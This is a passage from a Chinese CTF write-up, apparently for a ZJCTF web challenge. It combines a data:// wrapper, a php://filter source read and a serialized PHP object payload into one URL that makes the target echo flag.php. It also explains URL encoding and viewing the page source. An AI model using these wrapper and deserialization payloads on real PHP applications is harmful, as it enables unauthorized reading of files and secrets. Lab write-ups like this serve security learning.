<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">password=O:<span class="number">4</span>:<span class="string">&quot;FLAG&quot;</span>:<span class="number">1</span>:&#123;s:<span class="number">4</span>:<span class="string">&quot;file&quot;</span>;s:<span class="number">8</span>:<span class="string">&quot;flag.php&quot;</span>;&#125;</span><br></pre></td></tr></table></figure>
<p>把三个参数拼在一起：<code>text</code> 用 <code>data://</code> 伪协议直接提供要求的内容（<code>d2VsY29tZSB0byB0aGUgempjdGY=</code> 解码后为 <code>welcome to the zjctf</code>），<code>file</code> 用 <code>php://filter</code> 读源码，<code>password</code> 传反序列化串。整体 payload 为（其中 <code>data://filter/text/plain;base64,…</code> 这种写法不太常见，更常见的是 <code>data://text/plain;base64,…</code>，从后面的结果看这一写法也被接受了；反序列化串里的引号、分号和花括号在浏览器地址栏里会被自动 URL 编码，用 curl 或脚本发送时需自行编码）：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://url/?text=data://filter/text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&amp;</span><br><span class="line">file=php://filter/read=convert.base64-encode/resource=useless.php&amp;</span><br><span class="line">password=O:4:&quot;FLAG&quot;:1:&#123;s:4:&quot;file&quot;;s:8:&quot;flag.php&quot;;&#125;</span><br></pre></td></tr></table></figure>
<p>得到结果：<br><img src="https://img-blog.csdnimg.cn/202009230130042.png#pic_center" alt="发送整体 payload 后的响应页面"><br>由于 <code>__toString()</code> 是把 <code>flag.php</code> 的原文直接 <code>echo</code> 出来，而 flag 文件通常写在 <code>&lt;?php … ?&gt;</code> 标签内，浏览器渲染时会把它当作标签而不显示，因此需要查看网页源码（Ctrl+U）才能看到 FLAG。</p>
<p>DONE</p>